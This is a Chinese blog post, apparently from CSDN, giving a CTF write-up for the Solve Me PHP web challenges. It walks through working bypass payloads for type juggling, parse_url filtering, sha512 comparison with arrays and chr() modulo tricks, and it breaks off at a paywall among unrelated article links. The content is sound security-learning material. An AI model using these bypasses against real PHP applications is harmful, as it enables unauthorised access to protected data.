Solve Me解题记录

最新推荐文章于 2021-11-13 23:27:31 发布
最新推荐文章于 2021-11-13 23:27:31 发布
阅读量3.8k 收藏 3
点赞数 1
分类专栏: CTF Web 文章标签: Solve Me题解 Solve Me做题记录
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/u011377996/article/details/81671184
版权
本文记录了作者在Solve Me网站上完成CTF挑战的过程,涉及多种解题技巧,包括URL过滤绕过、哈希碰撞、JavaScript混淆代码解析等。通过实战,作者学到了很多关于Web安全和PHP的知识。
摘要由CSDN通过智能技术生成

前言

前一阵子关注点在实战上,现在又回归CTF学习套路了,这个网站http://solveme.peng.kr本来做了一半的题目,今天终于把他补完了,学到了炒鸡多的东西啊~

正文

Warm up

给出来一个密文和一段代码

1wMDEyY2U2YTY0M2NgMTEyZDQyMjAzNWczYjZgMWI4NTt3YWxmY=
<?php
    error_reporting(0);
    require __DIR__.'/lib.php';

    echo base64_encode(hex2bin(strrev(bin2hex($flag)))), '<hr>';

    highlight_file(__FILE__);

这题直接反过来写代码即可

<?php 
    $s = '1wMDEyY2U2YTY0M2NgMTEyZDQyMjAzNWczYjZgMWI4NTt3YWxmY=';
    echo hex2bin(strrev(bin2hex(base64_decode($s))));

Bad compare

 <?php
    error_reporting(0);
    require __DIR__.'/lib.php';

    if(isset($_GET['answer'])){

        if($_GET['answer'] === '尊찢悼嚴隆'){
            echo $flag;
        }else{
            echo 'Wrong answer';
        }

        echo '<hr>';
    }

    highlight_file(__FILE__);

这题可以知道我们要传进get参数,但是===后面的内容不在可见的ASCII码范围内于是我们抓包看一下
找到对应字符串的ASCII码,我们知道单引号url编码为%27,两个27之间的就是那串字符串的ASCII码,
直接构造payload:?answer=%f0%ee%c2%f5%d3%fa%e5%f1%d7%cc,得到flag

Winter sleep

<?php
    error_reporting(0);
    require __DIR__.'/lib.php';

    if(isset($_GET['time'])){

        if(!is_numeric($_GET['time'])){
            echo 'The time must be number.';

        }else if($_GET['time'] < 60 * 60 * 24 * 30 * 2){
            echo 'This time is too short.';

        }else if($_GET['time'] > 60 * 60 * 24 * 30 * 3){
            echo 'This time is too long.';

        }else{
            sleep((int)$_GET['time']);
            echo $flag;
        }

        echo '<hr>';
    }

    highlight_file(__FILE__);

这一个题目我们运用了int的强制转换科学计数法
这个题目先使用科学计数法绕过前面的两个time以及is_numeric,最后通过int的阶段获取到flag,因为60 * 60 * 24 * 30 * 2=5.184*10^6
现在的payload:?time=5.185e6,sleep大约5秒后出现flag
为什么出现这样的效果我们来测试一下

 $time = '5.185e6';
 $num1 = 60 * 60 * 24 * 30 * 2;
 $num2 = 60 * 60 * 24 * 30 * 3;
 var_dump(!is_numeric($time));
 var_dump($time>$num1);
 var_dump($time<$num2);
 var_dump((int)$time);

bool(false)
bool(true)
bool(true)
int(5)

Hard login

一开始上手这一个题目,发现什么头绪也没有,因为他的那些参数我一个都不知道,发现url有点奇怪后来就尝试着直接去访问index.php,网页顿了一下又回到了login.php,怀疑存在302跳转,于是抓包看一下,果然重定向到login.php
但同时我们也得到flag

还有第二种方法,直接curl一下看情况
P21ZSH.md.png

URL filtering

 <?php
    error_reporting(0);
    require __DIR__."/lib.php";

    $url = urldecode($_SERVER['REQUEST_URI']);
    $url_query = parse_url($url, PHP_URL_QUERY);

    $params = explode("&", $url_query);
    foreach($params as $param){

        $idx_equal = strpos($param, "=");
        if($idx_equal === false){
            $key = $param;
            $value = "";
        }else{
            $key = substr($param, 0, $idx_equal);
            $value = substr($param, $idx_equal + 1);
        }

        if(strpos($key, "do_you_want_flag") !== false || strpos($value, "yes") !== false){
            die("no hack");
        }
    }

    if(isset($_GET['do_you_want_flag']) && $_GET['do_you_want_flag'] == "yes"){
        die($flag);
    }

    highlight_file(__FILE__);

这一个题目我们可以发现存在parse_url函数,这个函数有个漏洞可以用多个/符号去绕过,然后就不会执行die("no hack");转而执行了下面的语句。
这里有篇方方土学长写过的总结:点我
构造的payload:///?do_you_want_flag=yes
后来发现还有官方的解法,就是利用描点去绕过,从来都不知道还可以这样搞
http://urlfiltering.solveme.peng.kr/?%23&do_you_want_flag=yes

Hash collision

<?php
    error_reporting(0);
    require __DIR__.'/lib.php';

    if(isset($_GET['foo'], $_GET['bar'])){

        if(strlen($_GET['foo']) > 30 || strlen($_GET['bar']) > 30){
            die('Too long');
        }

        if($_GET['foo'] === $_GET['bar']){
            die('Same value');
        }

        if(hash('sha512', $_GET['foo']) !== hash('sha512', $_GET['bar'])){
            die('Different hash');
        }

        echo $flag, '<hr>';
    }

    highlight_file(__FILE__);

这种题目做了很多遍了,就是利用数组返回NULL去绕过,构造下面的payload

?foo[]=1&bar[]=2

Array2String

<?php
    error_reporting(0);
    require __DIR__.'/lib.php';

    $value = $_GET['value'];

    $username = $_GET['username'];
    $password = $_GET['password'];

    for ($i = 0; $i < count($value); ++$i) {
        if ($_GET['username']) unset($username);
        if ($value[$i] > 32 && $value[$i] < 127) unset($value);
        else $username .= chr($value[$i]);

        if ($username == '15th_HackingCamp' && md5($password) == md5(file_get_contents('./secret.passwd'))) {
            echo 'Hello '.$username.'!', '<br>', PHP_EOL;
            echo $flag, '<hr>';
        }
    }

    highlight_file(__FILE__);

发现要跟./secret.passwd路径下的内容一样,先去里面看一下,发现字符串simple_passw0rd
这个题目get到了一个新的知识点

就是chr()这个函数再ASCII码超过255的时候会自动取余,我们利用这个特性去拼接username的字符串,于是写了个Python脚本构造payload: 

#!/usr/bin/python
# Author:0verWatch
# coding:utf-8

s = '''15th_HackingCamp'''
dit = []
payload = ''


for i in s:
    dit.append((ord(i)+256))
#print dit 

for j in dit:
    payload += ('value[]='+str(j)+'&')

print payload+'password=simple_passw0rd'

得到payload:

?value[]=305&value[]=309&value[]=372&value[]=360&value[]=351&value[]=328&value[]=353&value[]=355&value[]=363&value[]=361&value[]=366&value[]=359&value[]=323&value[]=353&value[]=365&value[]=368&password=simple_passw0rd

最后得到flag

Replace filter

<?php
    error_reporting(0);
    require __DIR__.'/lib.php';

    if(isset($_GET['say']) && strlen($_GET['say']) < 20){

        $say = preg_replace('/^(.*)flag(.*)$/', '${1}<!-- filtered -->${2}', $_GET['say']);

        if(preg_match('/give_me_the_flag/', $say)){
            echo $flag;
        }else{
            echo<
最低0.47元/天 解锁文章
0verWatch
关注
专栏目录
蓝桥杯历年真题JAVA版-2016年蓝桥杯省赛- Java组
猿小白的博客
04-28 2151
目录 第1题——生日蜡烛 第2题——方格填数 第3题——寒假作业 第4题——剪邮票 第5题——四平方和 第6题——密码脱落 第7题——煤球数目 第8题——凑算式 第9题——交换瓶子 第10题——平方怪圈 第11题——冰雹数 第12题——搭积木 第13题——取球博弈 第14题——压缩变换 第15题——有奖猜谜 第1题——生日蜡烛 (1)题目描述 某君从某年开始每年都举办一次生日party,并且每次都要吹熄与年龄相同根数的蜡烛。 现在算起来,他一共吹熄了236根蜡烛。 请问
NOI2015补全+解题报告
Zero's World
06-15 691
NOI2015解题报告
How To Clone Scrypt Based Altcoins for Fun and Profit
rion_chen的博客
04-09 1万+
Wait a second, why would you want to give out the secrets?!? Because its not a secret anymore and besides, why shouldn't everyone and their neighbors be able to create a plethora of these useless ye
13 Free Windows and Linux VPS Providers 2017
热门推荐
lwc_321的博客
08-22 11万+
13 Free Windows and Linux VPS Providers 2017 After surfing many days, I finally found some VPS providers that give us vps server with free of charge without having to pay anything. 1. DeskTone – VMw...
web1 ISCC
沐目的博客
05-31 277
打开连接,又是审计, <?php error_reporting(0); require 'flag.php'; $value = $_GET['value']; $password = $_GET['password']; $username = ''; for ($i = 0; $i < count($value); ++$i) { if ($value[$i] >...
ISCC2019-web1
S1lenc3的博客
05-05 179
明显是代码审计 <?phperror_reporting(0);require'flag.php';$value=$_GET['value'];$password=$_GET['password'];$username='';for($i=0;$i<count($value);++$i){if($value[$i]>32&...
ISCCweb1
ChenZIDu的博客
09-22 593
<?php error_reporting(0); require 'flag.php'; $value = $_GET['value']; $password = $_GET['password']; $username = ''; for ($i = 0; $i < count($value); ++$i) { if ($value[$i] > 32 &&a...
Leetcode:200题总结(一)
平凡
02-12 4957
题目做后还是要做一下总结,才能确切的知道自己通过做题收获了什么。 之前我一直享受刷题的快感,懒于及时做整理、总结,拖到了现在,刷了200题才打算开始。 这200题中有水题,有自己冥思苦想才解出的题,也有苦想之后做不出来然后看答案的题,也有一看题就知道自己不会做然后直接看答案的题。 979. Distribute Coins in Binary Tree class Solution { publi...
教师资格证(招聘)英语讲课常用语(1).doc
09-11
59. "Take notes, please." - 建议学生做笔记,记录重要信息。 60. "Li Hong, have you collected all the exercise-books?" - 询问李红是否收齐所有练习本。 这些常用语涵盖了课堂教学的各个环节,包括组织教学、...
iscc2019
wuerror的博客
06-05 993
iscc2019 misc welcome 加上后缀zip,打开将“蓅烺計劃 洮蓠朩暒”替换为0,“戶囗 萇條”替换为1。得到二进制串01100110011011000110000101100111011110110100100101010011010000110100001101011111010101110100010101001100010000110100111101001101010...
Virtuozzo电源面板的优势
culu1614的博客
08-09 1247
VPS servers are counted as the best hosting platform after shared server accounts. Virtual; servers are created over Dedicated server and designed to deploy the features like dedicated server with co...
CTF-PHP常见考点实例小结
告白的博客
11-13 3775
0x00 CTF-PHP常见考点 1.php弱类型的比较 2.php断言问题 3.php读取文件 4.preg_match绕过 5.sha1()函数与md5() 6.异或注入绕过 7.updatexml()函数考点 8.命令执行绕过:https://www.cnblogs.com/iloveacm/p/13687654.html 9.源文件泄露 10.extract变量覆盖 11.strcmp漏洞 … 参考网上师傅的总结,感觉不错值得学习:https://www.cnblogs.com/iloveacm
ISCC2019Writeup
火柴人的博客
07-10 726
web1 源码如下 <?php error_reporting(0); require 'flag.php'; $value = $_GET['value']; $password = $_GET['password']; $username = ''; for ($i = 0; $i < count($value); ++$i) { if ($valu...
网络黑人及防黑的基础知识(转)
cuankuangzhong6373的博客
05-03 3016
同志们,大家一定要记住,牧野的这篇贴只是想让大家对于网络知识有个了解,不要看了这篇连载后到处显示自己的'所谓的本领”啊,因为这些技术在懂行人的眼中可是好菜的啊,主要是用来骗MM的,:)   俗话说:'工欲善其事,必先利其器”(是...
Web安全技术-ctf2 writeup
y4ung
11-04 6014
文章目录0x00 第一题:Do you want flag?0x01 第二题:PHP is the BEST!0x02 第三题:ID system0x03 第四题:Upload3.1 方法一3.2 方法二0x04 参考资料 0x00 第一题:Do you want flag? 题目中提示了:You can tell me if you want flag 在输入框中输入flag,返回一个加...
献给web安全的CTF课堂小测
weixin_44765508的博客
11-18 1162
What’s your want? 根据题目提示:Do you want flag?输入“flag”,返回一个加密字符串 2. base64 解密得到:flag{WelC0me_to_ctf2} php is the best 点击“another page”,查看源码,发现web目录的树结构中有flag文件 源码中还有对file路径的过滤: strpos():查找字符串第一次出现位置 https://www.w3school.com.cn/php/func_string_str
ISCC2019比赛部分writeup
守卫者安全
05-28 3959
Misc 1. 附件地址 下载附件显示如下: 看了半天像是ascll码,但是有的已经超出范围了。 然后又觉得以0开头的是八进制的数,先进制转换。发现一段字符串看着像base64加密的 解密得到flag 2.Aesop's secret 附件地址 下载附件打开发现是一张gif图片,查看并没有什么卵用 然后记事本打开看看,发现最后有一堆字符串,比较可疑 ...
ctf日常学习记录(web)
qq_27396789的博客
01-11 6329
爆破1题目提示:flag就在某六位变量中。点开题目链接显示代码:<?php include "flag.php"; $a = @$_REQUEST['hello']; if(!preg_match('/^\w*$/',$a )){ die('ERROR'); } eval("var_dump($$a);"); show_source(__FILE__); ?>关键是这个东西var_dump($$
MotorSolve 4.0 电机设计完全指南
"MotorSolve 4.0 是一款专业的电机设计软件,提供全面的电机设计和分析功能。本手册详细介绍了软件的使用方法,包括界面布局、操作步骤和案例应用,适合初学者入门学习。" MotorSolve 4.0 是由海基科技开发的一款...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值